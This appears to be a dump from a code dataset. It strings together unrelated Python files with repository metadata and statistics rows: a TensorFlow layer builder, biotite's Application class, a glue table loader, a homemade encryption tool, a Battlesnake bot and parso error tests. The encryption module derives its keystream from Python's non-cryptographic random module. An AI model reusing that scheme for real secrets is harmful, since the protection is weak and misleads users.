name=os.path.join(self.variable_scope, 'layer%d' %i, layer_type))
elif layer_type == 'wide_conv2d':
# Conv. layer with equivalent params to low rank locally connected.
if self.config.rank < 1:
raise ValueError('rank should be > 0 for %s layer.' % layer_type)
chout = int((self.config.rank * chin + num_filters) / float(
chin + num_filters) * num_filters)
layer = tf.keras.layers.Conv2D(
filters=chout if i < (depth-1)
else int(num_filters * self.config.rank),
kernel_size=kernel_size, strides=(strides, strides),
padding=padding,
activation=None,
use_bias=not self.config.batch_norm,
kernel_initializer=self.config.kernel_initializer,
name=os.path.join(self.variable_scope, 'layer%d' %i, layer_type))
elif layer_type == 'locally_connected2d':
# Full locally connected layer.
chout = num_filters
layer = tf.keras.layers.LocallyConnected2D(
filters=chout,
kernel_size=(kernel_size, kernel_size),
strides=(strides, strides),
padding=padding,
activation=None,
use_bias=True, # not self.config.batch_norm,
name=os.path.join(self.variable_scope, 'layer%d' %i, layer_type),
kernel_initializer=self.config.kernel_initializer)
elif layer_type == 'low_rank_locally_connected2d':
if self.config.rank < 1:
raise ValueError('rank should be > 0 for %s layer.' % layer_type)
chout = num_filters
layer = layers.LowRankLocallyConnected2D(
filters=chout,
kernel_size=(kernel_size, kernel_size),
strides=(strides, strides),
padding=padding,
activation=None,
use_bias=not self.config.batch_norm,
name=os.path.join(self.variable_scope, 'layer%d' %i, layer_type),
kernel_initializer=self.config.kernel_initializer,
combining_weights_initializer=(
self.config.combining_weights_initializer),
spatial_rank=self.config.rank,
normalize_weights=self.config.normalize_weights,
input_dependent=config.input_dependent,
share_row_combining_weights=self.config.share_row_combining_weights,
share_col_combining_weights=self.config.share_col_combining_weights)
else:
raise ValueError('Can not recognize layer %s type.' % layer_type)
chin = chout
self.layers_list.append(layer)
self.pass_is_training_list.append(False)
if self.config.batch_norm:
layer = tf.keras.layers.BatchNormalization(
trainable=True, momentum=MOMENTUM, epsilon=EPS)
self.layers_list.append(layer)
self.pass_is_training_list.append(True)
layer = tf.keras.layers.ReLU()
self.layers_list.append(layer)
self.pass_is_training_list.append(False)
if self.config.global_avg_pooling:
self.layers_list.append(tf.keras.layers.GlobalAveragePooling2D())
else:
self.layers_list.append(tf.keras.layers.Flatten())
self.pass_is_training_list.append(False)
self.layers_list.append(tf.keras.layers.Dense(
units=self.config.num_classes, activation=None, use_bias=True,
name='logits'))
self.pass_is_training_list.append(False)
def __call__(self, images, is_training):
endpoints = {}
if self.config.coord_conv:
# Append position channels.
net = tf.concat([images, utils.position_channels(images)], axis=3)
else:
net = images
for i, (pass_is_training, layer) in enumerate(
zip(self.pass_is_training_list, self.layers_list)):
net = layer(net, training=is_training) if pass_is_training else layer(net)
endpoints['layer%d' % i] = net
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, layer.updates)
self.add_update(layer.updates)
logits = net
return logits, endpoints
| 37.982759
| 80
| 0.681192
| 843
| 6,609
| 5.11981
| 0.252669
| 0.07646
| 0.029194
| 0.029194
| 0.40987
| 0.368397
| 0.352641
| 0.305607
| 0.288925
| 0.267609
| 0
| 0.006463
| 0.227417
| 6,609
| 173
| 81
| 38.202312
| 0.838817
| 0.157966
| 0
| 0.373016
| 0
| 0
| 0.045528
| 0.005059
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015873
| false
| 0.071429
| 0.063492
| 0
| 0.095238
| 0.007937
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07dab8d1754575bc1f3f83e4e0cadea3c8dcd3af
| 8,104
|
py
|
Python
|
src/biotite/application/application.py
|
claudejrogers/biotite
|
3635bc9071506ecb85ddd9b1dbe6a430295e060e
|
[
"BSD-3-Clause"
] | null | null | null |
src/biotite/application/application.py
|
claudejrogers/biotite
|
3635bc9071506ecb85ddd9b1dbe6a430295e060e
|
[
"BSD-3-Clause"
] | null | null | null |
src/biotite/application/application.py
|
claudejrogers/biotite
|
3635bc9071506ecb85ddd9b1dbe6a430295e060e
|
[
"BSD-3-Clause"
] | null | null | null |
# This source code is part of the Biotite package and is distributed
# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further
# information.
__name__ = "biotite.application"
__author__ = "Patrick Kunzmann"
__all__ = ["Application", "AppStateError", "TimeoutError", "VersionError",
"AppState", "requires_state"]
import abc
import time
from functools import wraps
from enum import Flag, auto
class AppState(Flag):
"""
This enum type represents the app states of an application.
"""
CREATED = auto()
RUNNING = auto()
FINISHED = auto()
JOINED = auto()
CANCELLED = auto()
def requires_state(app_state):
"""
A decorator for methods of :class:`Application` subclasses that
raises an :class:`AppStateError` in case the method is called, when
the :class:`Application` is not in the specified :class:`AppState`
`app_state`.
Parameters
----------
app_state : AppState
The required app state.
Examples
--------
Raises :class:`AppStateError` when `function` is called,
if :class:`Application` is not in one of the specified states:
>>> @requires_state(AppState.RUNNING | AppState.FINISHED)
... def function(self):
... pass
"""
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
# First parameter of method is always 'self'
instance = args[0]
if not instance._state & app_state:
raise AppStateError(
f"The application is in {instance.get_app_state()} state, "
f"but {app_state} state is required"
)
return func(*args, **kwargs)
return wrapper
return decorator
class Application(metaclass=abc.ABCMeta):
"""
This class is a wrapper around an external piece of runnable
software in any sense. Subclasses of this abstract base class
specify the respective kind of software and the way of interacting
with it.
Every :class:`Application` runs through a different app states
(instances of enum :class:`AppState`) from its creation until its
termination:
Directly after its instantiation the app is in the *CREATED* state.
In this state further parameters can be set for the application run.
After the user calls the :func:`start()` method, the app state is
set to *RUNNING* and the :class:`Application` type specific
:func:`run()` method is called.
When the application finishes the AppState changes to *FINISHED*.
This is checked via the :class:`Application` type specific
:func:`is_finished()` method.
The user can now call the :func:`join()` method, concluding the
application in the *JOINED* state and making the results of the
application accessible by executing the :class:`Application`
type specific :func:`evaluate()` method.
Furthermore this executes the :class:`Application` type specific
:func:`clean_up()` method.
:func:`join()` can even be called in the *RUNNING* state:
This will constantly check :func:`is_finished()` and will directly
go into the *JOINED* state as soon as the application reaches the
*FINISHED* state.
Calling the :func:`cancel()` method while the application is
*RUNNING* or *FINISHED* leaves the application in the *CANCELLED*
state.
This triggers the :func:`clean_up()` method, too, but there are no
accessible results.
If a method is called in an unsuitable app state, an
:class:`AppStateError` is called.
The application run behaves like an additional thread: Between the
call of :func:`start()` and :func:`join()` other Python code can be
executed, while the application runs in the background.
"""
def __init__(self):
self._state = AppState.CREATED
@requires_state(AppState.CREATED)
def start(self):
"""
Start the application run and set its state to *RUNNING*.
This can only be done from the *CREATED* state.
"""
self.run()
self._start_time = time.time()
self._state = AppState.RUNNING
@requires_state(AppState.RUNNING | AppState.FINISHED)
def join(self, timeout=None):
"""
Conclude the application run and set its state to *JOINED*.
This can only be done from the *RUNNING* or *FINISHED* state.
If the application is *FINISHED* the joining process happens
immediately, if otherwise the application is *RUNNING*, this
method waits until the application is *FINISHED*.
Parameters
----------
timeout : float, optional
If this parameter is specified, the :class:`Application`
only waits for finishing until this value (in seconds) runs
out.
After this time is exceeded a :class:`TimeoutError` is
raised and the application is cancelled.
Raises
------
TimeoutError
If the joining process exceeds the `timeout` value.
"""
time.sleep(self.wait_interval())
while self.get_app_state() != AppState.FINISHED:
if timeout is not None and time.time()-self._start_time > timeout:
self.cancel()
raise TimeoutError(
f"The application expired its timeout "
f"({timeout:.1f} s)"
)
else:
time.sleep(self.wait_interval())
time.sleep(self.wait_interval())
try:
self.evaluate()
except AppStateError:
raise
except:
self._state = AppState.CANCELLED
raise
else:
self._state = AppState.JOINED
self.clean_up()
@requires_state(AppState.RUNNING | AppState.FINISHED)
def cancel(self):
"""
Cancel the application when in *RUNNING* or *FINISHED* state.
"""
self._state = AppState.CANCELLED
self.clean_up()
def get_app_state(self):
"""
Get the current app state.
Returns
-------
app_state : AppState
The current app state.
"""
if self._state == AppState.RUNNING:
if self.is_finished():
self._state = AppState.FINISHED
return self._state
@abc.abstractmethod
def run(self):
"""
Commence the application run. Called in :func:`start()`.
PROTECTED: Override when inheriting.
"""
pass
@abc.abstractmethod
def is_finished(self):
"""
Check if the application has finished.
PROTECTED: Override when inheriting.
Returns
-------
finished : bool
True of the application has finished, false otherwise
"""
pass
@abc.abstractmethod
def wait_interval(self):
"""
The time interval of :func:`is_finished()` calls in the joining
process.
PROTECTED: Override when inheriting.
Returns
-------
interval : float
Time (in seconds) between calls of :func:`is_finished()` in
:func:`join()`
"""
pass
@abc.abstractmethod
def evaluate(self):
"""
Evaluate application results. Called in :func:`join()`.
PROTECTED: Override when inheriting.
"""
pass
def clean_up(self):
"""
Do clean up work after the application terminates.
PROTECTED: Optionally override when inheriting.
"""
pass
class AppStateError(Exception):
"""
Indicate that the application lifecycle was violated.
"""
pass
class TimeoutError(Exception):
"""
Indicate that the application's timeout expired.
"""
pass
class VersionError(Exception):
"""
Indicate that the application's version is invalid.
"""
pass
| 31.169231
| 79
| 0.604516
| 918
| 8,104
| 5.269063
| 0.248366
| 0.072359
| 0.024602
| 0.01902
| 0.167666
| 0.096547
| 0.052719
| 0.013645
| 0
| 0
| 0
| 0.000534
| 0.307132
| 8,104
| 260
| 80
| 31.169231
| 0.860908
| 0.538129
| 0
| 0.287356
| 0
| 0
| 0.086515
| 0.009107
| 0
| 0
| 0
| 0
| 0
| 1
| 0.149425
| false
| 0.091954
| 0.045977
| 0
| 0.356322
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07eb8c54a1c0d882798ebdd645e52dda754bb70e
| 759
|
py
|
Python
|
glue/core/data_factories/tables.py
|
rosteen/glue
|
ed71979f8e0e41f993a2363b3b5a8f8c3167a130
|
[
"BSD-3-Clause"
] | 550
|
2015-01-08T13:51:06.000Z
|
2022-03-31T11:54:47.000Z
|
glue/core/data_factories/tables.py
|
mmorys/glue
|
b58ced518ba6f56c59a4e03ffe84afa47235e193
|
[
"BSD-3-Clause"
] | 1,362
|
2015-01-03T19:15:52.000Z
|
2022-03-30T13:23:11.000Z
|
glue/core/data_factories/tables.py
|
mmorys/glue
|
b58ced518ba6f56c59a4e03ffe84afa47235e193
|
[
"BSD-3-Clause"
] | 142
|
2015-01-08T13:08:00.000Z
|
2022-03-18T13:25:57.000Z
|
from glue.core.data_factories.helpers import has_extension
from glue.config import data_factory
__all__ = ['tabular_data']
@data_factory(label="ASCII Table",
identifier=has_extension('csv txt tsv tbl dat '
'csv.gz txt.gz tbl.bz '
'dat.gz'),
priority=1)
def tabular_data(path, **kwargs):
from glue.core.data_factories.astropy_table import astropy_tabular_data
from glue.core.data_factories.pandas import pandas_read_table
for fac in [astropy_tabular_data, pandas_read_table]:
try:
return fac(path, **kwargs)
except Exception:
pass
else:
raise IOError("Could not parse file: %s" % path)
| 33
| 75
| 0.613966
| 93
| 759
| 4.774194
| 0.516129
| 0.072072
| 0.081081
| 0.108108
| 0.168919
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001894
| 0.304348
| 759
| 22
| 76
| 34.5
| 0.839015
| 0
| 0
| 0
| 0
| 0
| 0.123847
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.055556
| 0.222222
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07f12eb8f08aef21196193b3111071cb20b8013a
| 1,884
|
py
|
Python
|
silver_bullet/crypto.py
|
Hojung-Jeong/Silver-Bullet-Encryption-Tool
|
5ea29b3cd78cf7488e0cbdcf4ea60d7c9151c2a7
|
[
"Apache-2.0"
] | null | null | null |
silver_bullet/crypto.py
|
Hojung-Jeong/Silver-Bullet-Encryption-Tool
|
5ea29b3cd78cf7488e0cbdcf4ea60d7c9151c2a7
|
[
"Apache-2.0"
] | null | null | null |
silver_bullet/crypto.py
|
Hojung-Jeong/Silver-Bullet-Encryption-Tool
|
5ea29b3cd78cf7488e0cbdcf4ea60d7c9151c2a7
|
[
"Apache-2.0"
] | null | null | null |
'''
>List of functions
1. encrypt(user_input,passphrase) - Encrypt the given string with the given passphrase. Returns cipher text and locked pad.
2. decrypt(cipher_text,locked_pad,passphrase) - Decrypt the cipher text encrypted with SBET. It requires cipher text, locked pad, and passphrase.
'''
# CODE ========================================================================
import zlib
import random
from hashlib import sha1
from silver_bullet.TRNG import trlist
from silver_bullet.contain_value import contain
ascii_value=256
def ciphering(target_list,pad,decrypt=False):
result=[]
for counter in range(len(pad)):
if decrypt==False:
operated=contain(target_list[counter]+pad[counter],ascii_value)
else:
operated=contain(int(target_list[counter])-pad[counter],ascii_value)
result.append(operated)
return result
def locker(pad,passphrase):
cutter=round(len(passphrase)/2)
splited=[passphrase[:cutter],passphrase[cutter:]]
locker=[0 for counter in range(len(pad))]
for element in splited:
bloated_seed=sha1(element.encode()).hexdigest()
random.seed(bloated_seed)
locker=[contain(random.randrange(ascii_value)+element,ascii_value) for element in locker]
holder=[]
for counter in range(len(pad)):
operated=int(pad[counter])^locker[counter]
holder.append(operated)
return holder
def encrypt(user_input,passphrase):
compressed=zlib.compress(user_input.encode())
ui_listed=list(compressed)
pad=trlist(len(ui_listed),ascii_value)
ct=ciphering(ui_listed,pad)
lp=locker(pad,passphrase)
cipher_text=' '.join(map(str,ct))
locked_pad=' '.join(map(str,lp))
return cipher_text, locked_pad
def decrypt(cipher_text,locked_pad,passphrase):
ct=cipher_text.split(' ')
lp=locked_pad.split(' ')
pad=locker(lp,passphrase)
pt=ciphering(ct,pad,True)
byted=bytes(pt)
decompressed=zlib.decompress(byted).decode()
return decompressed
| 24.789474
| 146
| 0.735669
| 260
| 1,884
| 5.215385
| 0.323077
| 0.058997
| 0.047198
| 0.056047
| 0.158555
| 0.158555
| 0.054572
| 0
| 0
| 0
| 0
| 0.00536
| 0.108811
| 1,884
| 76
| 147
| 24.789474
| 0.802263
| 0.213907
| 0
| 0.044444
| 0
| 0
| 0.002653
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088889
| false
| 0.155556
| 0.111111
| 0
| 0.288889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07f21adedf8ef7aa0ba52361a9cf4372ad43ac9a
| 4,967
|
py
|
Python
|
app/nextMoveLogic.py
|
thekitbag/starter-snake-python
|
48d12d2fa61ecfc976cd5750316b1db49a641f7f
|
[
"MIT"
] | null | null | null |
app/nextMoveLogic.py
|
thekitbag/starter-snake-python
|
48d12d2fa61ecfc976cd5750316b1db49a641f7f
|
[
"MIT"
] | null | null | null |
app/nextMoveLogic.py
|
thekitbag/starter-snake-python
|
48d12d2fa61ecfc976cd5750316b1db49a641f7f
|
[
"MIT"
] | null | null | null |
import random
class Status(object):
def getHeadPosition(gamedata):
me = gamedata['you']
my_position = me['body']
head = my_position[0]
return head
def getMyLength(gamedata):
me = gamedata['you']
my_position = me['body']
if my_position[0] == my_position[1] == my_position[2]:
return 1
elif my_position[1] == my_position[2]:
return 2
else: return len(my_position)
def getMyDirection(gamedata):
me = gamedata['you']
my_position = me['body']
if Status.getMyLength(gamedata) == 1:
return 'none'
elif my_position[0]['x'] > my_position[1]['x']:
return 'right'
elif my_position[0]['x'] < my_position[1]['x']:
return 'left'
elif my_position[0]['x'] == my_position[1]['x'] and my_position[0]['y'] < my_position[1]['y']:
return 'up'
else: return 'down'
def getHealth(gamedata):
pass
def getBoardSize(gamedata):
board_height = gamedata['board']['height']
board_width = gamedata['board']['width']
dimensions = {'height': board_height, 'width': board_width}
return dimensions
def getFoodPositions(gamedata):
pass
def getSnakesPositions(gamedata):
pass
class Assess(object):
def wallProximity(gamedata):
"""returns proximity to a wall
either parallel to, head-on or corner"""
head = Status.getHeadPosition(gamedata)
board_size = Status.getBoardSize(gamedata)
direction = Status.getMyDirection(gamedata)
height = board_size['height'] - 1
width = board_size['width'] - 1
#corners
if head['x'] == 0 and head['y'] == 0:
return {'type': 'corner', 'identifier': 'top left', 'direction': direction}
elif head['x'] == 0 and head['y'] == height:
return {'type': 'corner', 'identifier': 'bottom left', 'direction': direction}
elif head['x'] == width and head['y'] == 0:
return {'type': 'corner', 'identifier': 'top right', 'direction': direction}
elif head['x'] == width and head['y'] == height:
return {'type': 'corner', 'identifier': 'bottom right', 'direction': direction}
#headons
elif head['x'] == 0 and direction == 'left':
return {'type': 'head-on', 'identifier': 'left', 'direction': direction}
elif head['y'] == 0 and direction == 'up':
return {'type': 'head-on', 'identifier': 'top', 'direction': direction}
elif head['x'] == width and direction == 'right':
return {'type': 'head-on', 'identifier': 'right', 'direction': direction}
elif head['y'] == height and direction == 'down':
return {'type': 'head-on', 'identifier': 'bottom', 'direction': direction}
#parrallels
elif head['x'] == 0 and direction == 'up' or head['x'] == 0 and direction == 'down':
return {'type': 'parallel', 'identifier': 'left', 'direction': direction}
elif head['y'] == 0 and direction == 'right' or head['y'] == 0 and direction =='left':
return {'type': 'parallel', 'identifier': 'top', 'direction': direction}
elif head['x'] == width and direction =='down' or head['x'] == width and direction == 'up':
return {'type': 'parallel', 'identifier': 'right', 'direction': direction}
elif head['y'] == height and direction == 'left' or head['y'] == height and direction == 'right':
return {'type': 'parallel', 'identifier': 'bottom', 'direction': direction}
else: return False
def ownBodyProximity(gamedata):
pass
def killPossible(gamedata):
pass
def smallerSnakeNearby(gamedata):
pass
def biggerSnakeNearby(gamedata):
pass
def foodNearby(gamedata):
pass
class Action(object):
def avoidDeath():
pass
def chaseFood():
pass
def fleeSnake():
pass
def chaseSnake():
pass
class Decision(object):
def chooseBestOption(gamedata):
options = ['up', 'down', 'right', 'left']
current_direction = Status.getMyDirection(gamedata)
#first go
if current_direction == 'none':
choice = random.choice(options)
#remove opposite direction
if current_direction == 'up':
options.remove('down')
if current_direction == 'down':
options.remove('up')
if current_direction == 'right':
options.remove('left')
if current_direction == 'left':
options.remove('right')
#no danger keep going
if Assess.wallProximity(gamedata) == False:
choice = current_direction
#in a corner
elif Assess.wallProximity(gamedata)['type'] == 'corner':
options.remove(current_direction)
if Assess.wallProximity(gamedata)['identifier'][0] == 't' and Assess.wallProximity(gamedata)['identifier'][4] == 'l':
if 'up' in options:
choice = 'down'
else: choice = 'right'
elif Assess.wallProximity(gamedata)['identifier'][0] == 't' and Assess.wallProximity(gamedata)['identifier'][4] == 'r':
if 'up' in options:
choice = 'down'
else: choice = 'left'
#headon
elif Assess.wallProximity(gamedata)['type'] == 'head-on':
options.remove(current_direction)
choice = random.choice(options)
#parallel
elif Assess.wallProximity(gamedata)['type'] == 'parallel':
choice = current_direction
else: print("shit")
print(options)
return choice
| 29.217647
| 122
| 0.655124
| 604
| 4,967
| 5.32947
| 0.155629
| 0.055918
| 0.06151
| 0.072693
| 0.462255
| 0.370923
| 0.331469
| 0.314073
| 0.282075
| 0.177074
| 0
| 0.008033
| 0.172941
| 4,967
| 169
| 123
| 29.390533
| 0.77556
| 0.034629
| 0
| 0.227642
| 0
| 0
| 0.155635
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.146341
| false
| 0.097561
| 0.00813
| 0
| 0.357724
| 0.01626
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07fb390e2fe8908e8e3a429d629ca30f1d77df66
| 11,225
|
py
|
Python
|
test/test_python_errors.py
|
yangyangxcf/parso
|
e496b07b6342f6182225a60aad6031d7ad08f24d
|
[
"PSF-2.0"
] | null | null | null |
test/test_python_errors.py
|
yangyangxcf/parso
|
e496b07b6342f6182225a60aad6031d7ad08f24d
|
[
"PSF-2.0"
] | null | null | null |
test/test_python_errors.py
|
yangyangxcf/parso
|
e496b07b6342f6182225a60aad6031d7ad08f24d
|
[
"PSF-2.0"
] | null | null | null |
"""
Testing if parso finds syntax errors and indentation errors.
"""
import sys
import warnings
import pytest
import parso
from parso._compatibility import is_pypy
from .failing_examples import FAILING_EXAMPLES, indent, build_nested
if is_pypy:
# The errors in PyPy might be different. Just skip the module for now.
pytestmark = pytest.mark.skip()
def _get_error_list(code, version=None):
grammar = parso.load_grammar(version=version)
tree = grammar.parse(code)
return list(grammar.iter_errors(tree))
def assert_comparison(code, error_code, positions):
errors = [(error.start_pos, error.code) for error in _get_error_list(code)]
assert [(pos, error_code) for pos in positions] == errors
@pytest.mark.parametrize('code', FAILING_EXAMPLES)
def test_python_exception_matches(code):
wanted, line_nr = _get_actual_exception(code)
errors = _get_error_list(code)
actual = None
if errors:
error, = errors
actual = error.message
assert actual in wanted
# Somehow in Python3.3 the SyntaxError().lineno is sometimes None
assert line_nr is None or line_nr == error.start_pos[0]
def test_non_async_in_async():
"""
This example doesn't work with FAILING_EXAMPLES, because the line numbers
are not always the same / incorrect in Python 3.8.
"""
if sys.version_info[:2] < (3, 5):
pytest.skip()
# Raises multiple errors in previous versions.
code = 'async def foo():\n def nofoo():[x async for x in []]'
wanted, line_nr = _get_actual_exception(code)
errors = _get_error_list(code)
if errors:
error, = errors
actual = error.message
assert actual in wanted
if sys.version_info[:2] < (3, 8):
assert line_nr == error.start_pos[0]
else:
assert line_nr == 0 # For whatever reason this is zero in Python 3.8+
@pytest.mark.parametrize(
('code', 'positions'), [
('1 +', [(1, 3)]),
('1 +\n', [(1, 3)]),
('1 +\n2 +', [(1, 3), (2, 3)]),
('x + 2', []),
('[\n', [(2, 0)]),
('[\ndef x(): pass', [(2, 0)]),
('[\nif 1: pass', [(2, 0)]),
('1+?', [(1, 2)]),
('?', [(1, 0)]),
('??', [(1, 0)]),
('? ?', [(1, 0)]),
('?\n?', [(1, 0), (2, 0)]),
('? * ?', [(1, 0)]),
('1 + * * 2', [(1, 4)]),
('?\n1\n?', [(1, 0), (3, 0)]),
]
)
def test_syntax_errors(code, positions):
assert_comparison(code, 901, positions)
@pytest.mark.parametrize(
('code', 'positions'), [
(' 1', [(1, 0)]),
('def x():\n 1\n 2', [(3, 0)]),
('def x():\n 1\n 2', [(3, 0)]),
('def x():\n1', [(2, 0)]),
]
)
def test_indentation_errors(code, positions):
assert_comparison(code, 903, positions)
def _get_actual_exception(code):
with warnings.catch_warnings():
# We don't care about warnings where locals/globals misbehave here.
# It's as simple as either an error or not.
warnings.filterwarnings('ignore', category=SyntaxWarning)
try:
compile(code, '<unknown>', 'exec')
except (SyntaxError, IndentationError) as e:
wanted = e.__class__.__name__ + ': ' + e.msg
line_nr = e.lineno
except ValueError as e:
# The ValueError comes from byte literals in Python 2 like '\x'
# that are oddly enough not SyntaxErrors.
wanted = 'SyntaxError: (value error) ' + str(e)
line_nr = None
else:
assert False, "The piece of code should raise an exception."
# SyntaxError
# Python 2.6 has a bit different error messages here, so skip it.
if sys.version_info[:2] == (2, 6) and wanted == 'SyntaxError: unexpected EOF while parsing':
wanted = 'SyntaxError: invalid syntax'
if wanted == 'SyntaxError: non-keyword arg after keyword arg':
# The python 3.5+ way, a bit nicer.
wanted = 'SyntaxError: positional argument follows keyword argument'
elif wanted == 'SyntaxError: assignment to keyword':
return [wanted, "SyntaxError: can't assign to keyword",
'SyntaxError: cannot assign to __debug__'], line_nr
elif wanted == 'SyntaxError: assignment to None':
# Python 2.6 does has a slightly different error.
wanted = 'SyntaxError: cannot assign to None'
elif wanted == 'SyntaxError: can not assign to __debug__':
# Python 2.6 does has a slightly different error.
wanted = 'SyntaxError: cannot assign to __debug__'
elif wanted == 'SyntaxError: can use starred expression only as assignment target':
# Python 3.4/3.4 have a bit of a different warning than 3.5/3.6 in
# certain places. But in others this error makes sense.
return [wanted, "SyntaxError: can't use starred expression here"], line_nr
elif wanted == 'SyntaxError: f-string: unterminated string':
wanted = 'SyntaxError: EOL while scanning string literal'
elif wanted == 'SyntaxError: f-string expression part cannot include a backslash':
return [
wanted,
"SyntaxError: EOL while scanning string literal",
"SyntaxError: unexpected character after line continuation character",
], line_nr
elif wanted == "SyntaxError: f-string: expecting '}'":
wanted = 'SyntaxError: EOL while scanning string literal'
elif wanted == 'SyntaxError: f-string: empty expression not allowed':
wanted = 'SyntaxError: invalid syntax'
elif wanted == "SyntaxError: f-string expression part cannot include '#'":
wanted = 'SyntaxError: invalid syntax'
elif wanted == "SyntaxError: f-string: single '}' is not allowed":
wanted = 'SyntaxError: invalid syntax'
return [wanted], line_nr
def test_default_except_error_postition():
# For this error the position seemed to be one line off, but that doesn't
# really matter.
code = 'try: pass\nexcept: pass\nexcept X: pass'
wanted, line_nr = _get_actual_exception(code)
error, = _get_error_list(code)
assert error.message in wanted
assert line_nr != error.start_pos[0]
# I think this is the better position.
assert error.start_pos[0] == 2
def test_statically_nested_blocks():
def build(code, depth):
if depth == 0:
return code
new_code = 'if 1:\n' + indent(code)
return build(new_code, depth - 1)
def get_error(depth, add_func=False):
code = build('foo', depth)
if add_func:
code = 'def bar():\n' + indent(code)
errors = _get_error_list(code)
if errors:
assert errors[0].message == 'SyntaxError: too many statically nested blocks'
return errors[0]
return None
assert get_error(19) is None
assert get_error(19, add_func=True) is None
assert get_error(20)
assert get_error(20, add_func=True)
def test_future_import_first():
def is_issue(code, *args):
code = code % args
return bool(_get_error_list(code))
i1 = 'from __future__ import division'
i2 = 'from __future__ import absolute_import'
assert not is_issue(i1)
assert not is_issue(i1 + ';' + i2)
assert not is_issue(i1 + '\n' + i2)
assert not is_issue('"";' + i1)
assert not is_issue('"";' + i1)
assert not is_issue('""\n' + i1)
assert not is_issue('""\n%s\n%s', i1, i2)
assert not is_issue('""\n%s;%s', i1, i2)
assert not is_issue('"";%s;%s ', i1, i2)
assert not is_issue('"";%s\n%s ', i1, i2)
assert is_issue('1;' + i1)
assert is_issue('1\n' + i1)
assert is_issue('"";1\n' + i1)
assert is_issue('""\n%s\nfrom x import a\n%s', i1, i2)
assert is_issue('%s\n""\n%s', i1, i2)
def test_named_argument_issues(works_not_in_py):
message = works_not_in_py.get_error_message('def foo(*, **dict): pass')
message = works_not_in_py.get_error_message('def foo(*): pass')
if works_not_in_py.version.startswith('2'):
assert message == 'SyntaxError: invalid syntax'
else:
assert message == 'SyntaxError: named arguments must follow bare *'
works_not_in_py.assert_no_error_in_passing('def foo(*, name): pass')
works_not_in_py.assert_no_error_in_passing('def foo(bar, *, name=1): pass')
works_not_in_py.assert_no_error_in_passing('def foo(bar, *, name=1, **dct): pass')
def test_escape_decode_literals(each_version):
"""
We are using internal functions to assure that unicode/bytes escaping is
without syntax errors. Here we make a bit of quality assurance that this
works through versions, because the internal function might change over
time.
"""
def get_msg(end, to=1):
base = "SyntaxError: (unicode error) 'unicodeescape' " \
"codec can't decode bytes in position 0-%s: " % to
return base + end
def get_msgs(escape):
return (get_msg('end of string in escape sequence'),
get_msg(r"truncated %s escape" % escape))
error, = _get_error_list(r'u"\x"', version=each_version)
assert error.message in get_msgs(r'\xXX')
error, = _get_error_list(r'u"\u"', version=each_version)
assert error.message in get_msgs(r'\uXXXX')
error, = _get_error_list(r'u"\U"', version=each_version)
assert error.message in get_msgs(r'\UXXXXXXXX')
error, = _get_error_list(r'u"\N{}"', version=each_version)
assert error.message == get_msg(r'malformed \N character escape', to=2)
error, = _get_error_list(r'u"\N{foo}"', version=each_version)
assert error.message == get_msg(r'unknown Unicode character name', to=6)
# Finally bytes.
error, = _get_error_list(r'b"\x"', version=each_version)
wanted = r'SyntaxError: (value error) invalid \x escape'
if sys.version_info >= (3, 0):
# The positioning information is only available in Python 3.
wanted += ' at position 0'
assert error.message == wanted
def test_too_many_levels_of_indentation():
assert not _get_error_list(build_nested('pass', 99))
assert _get_error_list(build_nested('pass', 100))
base = 'def x():\n if x:\n'
assert not _get_error_list(build_nested('pass', 49, base=base))
assert _get_error_list(build_nested('pass', 50, base=base))
@pytest.mark.parametrize(
'code', [
"f'{*args,}'",
r'f"\""',
r'f"\\\""',
r'fr"\""',
r'fr"\\\""',
r"print(f'Some {x:.2f} and some {y}')",
]
)
def test_valid_fstrings(code):
assert not _get_error_list(code, version='3.6')
@pytest.mark.parametrize(
('code', 'message'), [
("f'{1+}'", ('invalid syntax')),
(r'f"\"', ('invalid syntax')),
(r'fr"\"', ('invalid syntax')),
]
)
def test_invalid_fstrings(code, message):
"""
Some fstring errors are handled differntly in 3.6 and other versions.
Therefore check specifically for these errors here.
"""
error, = _get_error_list(code, version='3.6')
assert message in error.message
@pytest.mark.parametrize(
'code', [
"from foo import (\nbar,\n rab,\n)",
"from foo import (bar, rab, )",
]
)
def test_trailing_comma(code):
errors = _get_error_list(code)
assert not errors
| 34.860248
| 96
| 0.625568
| 1,546
| 11,225
| 4.372574
| 0.207633
| 0.031953
| 0.035503
| 0.023669
| 0.383728
| 0.331953
| 0.29142
| 0.219379
| 0.203698
| 0.156805
